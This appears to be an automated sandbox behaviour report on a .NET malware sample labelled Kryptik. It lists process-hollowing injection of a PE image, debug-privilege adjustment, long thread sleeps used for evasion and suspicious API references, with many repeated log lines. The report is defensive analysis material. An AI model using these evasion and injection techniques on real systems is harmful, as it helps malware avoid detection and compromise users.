Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe TID: 6524	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe TID: 7092	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Window / User API: threadDelayed 956

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Code function: 7_2_0175C1D7 LdrInitializeThunk,

7_2_0175C1D7

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, ?k??u0026/u05c1????.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, ?k??u0026/u05c1????.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, ?k??u0026/u05c1????.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, ?k??u0026/u05c1????.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, ?k??u0026/u05c1????.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, ?k??u0026/u05c1????.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Memory written: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
